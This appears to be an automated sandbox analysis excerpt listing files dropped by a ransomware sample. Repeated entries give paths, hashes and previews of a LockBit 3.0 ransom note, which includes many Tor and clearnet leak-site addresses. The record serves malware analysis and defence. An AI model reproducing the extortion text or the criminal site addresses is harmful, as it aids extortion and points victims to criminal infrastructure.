                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.HolographicFirstRun_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\AppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalCache\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\LocalState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\RoamingState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\Settings\settings.dat.g0sOhfQ0Z

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):8431
                Entropy (8bit):7.981473709089156
                Encrypted:false
                SSDEEP:192:5isJbh8+MsH6bThnlEdgu9GQx+DiBKHdOo8bADT/o:go9X6bNqbYtHMvbSQ
                MD5:CB164E1C6AC991EAF3AEE469D9F7521C
                SHA1:8D4D71CDF5E0D2A839B8296A10D5075624A2ABCF
                SHA-256:4B061898B248DDA2E1DC5DF7B9AB91D02C4EF7DB3A3EC600C5CAE1CC3A03F66E
                SHA-512:B838B44647AD7AE5D6AA57264450E7922A3F5C866AFB97C1F99316FD7AD260E91E89FE5DB9AAA409E9332B0BB2E4E608A9C8C2DEED6FCF830C0087AB55BCBCC2
                Malicious:false
                Preview:...~.1..T..D..y.x;e.....`.k...E2y....l.9SSv._4...b...gB...b.......|.Gke...AJ..#..... ^.`.u.9.......>...WT..\..q..g..}6.0"t..QFC..C......0.A..).j..ekL..@.K.._../.3..u..&h.t.h..w.....Ujcf..;....y.v.,a.".A..].}\..+.Qj.E.}5......4<!lK..D..ca.9.4....y?.%I.<...G.....c.8...........E.....v.......x?....../.}...f........+.:...p.=.'....0.4...V|...O.T..)..k..G..M...,H}.. ...$....u}`..f.>..@'...3.d4....QD._....?.....O..*OG.L..7.+.,.Y2.m.*8<.s........L...c.3..-q..HJ.....,R.Ux.6TK.!.,R...5%/].....A....Y..r.g.....T1o9.-...Q.j.{..b..?C...Z.^s...s^...7;H.2.M...Y.',D?T..idK....I........D]...)..R....:...m`C..7;......L5......-....y....Em..J.....0)#... .<,N...+.....OA........Z\..7>..d!..>~.}..`....EI....p...](....c.....d.b.-D..DH0.s"-....M..t.".8v!f...V...3s..UA.j....;OZRF..a..V....0$)L6..0....</...eR...}|R..t...w...+..+.].......<W..x ...+i.4..p2...K...p.o 46M...E.:..../.y.g.w*.A..~....QW.c.a....8...........h+MC(.KP...4.......=..B82z..,.d;.j.._F....R..p.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\SystemAppData\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\TempState\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkCaptivePortal_cw5n1h2txyewy\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\Temp\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
                SSDEEP:192:uWo127U5RbnfuoHVMemUMHGU+d8EQv8l6NziY9B8N27U5RbnfuoHVMmmUMHl:ZoUSnYxlFFiYscSpYF
                MD5:C527482676DC2789ADFDE4A6D907D434
                SHA1:265A162DC354BD41704AD20C318B7D549D8B1F0F
                SHA-256:C9008DF4BFB6B2D42B3B36A96FBF4DD9C710ED595F79F38EE6636A59710B2BB3
                SHA-512:0CF1AA61CACD5D7AFEA2DCBE4CD0FACFE592139FDB90EE52B961B42E61BAE5118DFDDAB9CDA036CE068FD194207E408FC3E5D3B308D4C00D0EA548EADF415336
                Malicious:false
                Preview:.. ~~~ LockBit 3.0 the world's fastest ransomware since 2019~~~....>>>> Your data are stolen and encrypted.....The data will be published on TOR website if you do not pay the ransom .....Links for Tor Browser:...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion...http://lockbitapt5x4zkjbcqmz6frdhecqqgadevyiwqxukksspnlidyvd7qd.onion...http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion...http://lockbitapt34kvrip6xojylohhxrwsvpzdffgs5z4pbbsywnzsbdguqd.onion...http://lockbitaptc2iq4atewz2ise62q63wfktyrl4qtwuk5qax262kgtzjqd.onion...http://lockbitaptjpikdqjynvgozhgc6bgetgucdk5xjacozeaawihmoio6yd.onion...http://lockbitaptq7ephv2oigdncfhtwhpqgwmqojnxqdyhprxxfpcllqdxad.onion...http://lockbitaptstzf3er2lz6ku3xuifafq2yh5lmiqj5ncur6rtlmkteiqd.onion...http://lockbitaptoofrpignlz6dt2wqqc5z3a4evjevoa3eqdfcntxad5lmyd.onion.....Links for the normal browser...http://lockbitapt.uz...http://lockbitapt2yfbt7lchxejug47kmqvqqxvvjpqkmevv4l3azl3gy6pyd.onion.ly.

                C:\Users\user\AppData\Local\Packages\Microsoft.Windows.OOBENetworkConnectionFlow_cw5n1h2txyewy\AC\g0sOhfQ0Z.README.txt

                Download File
                Process:C:\Users\user\Desktop\file.exe
                File Type:Unknown
                Category:dropped
                Size (bytes):6197
                Entropy (8bit):5.275710013336669
                Encrypted:false
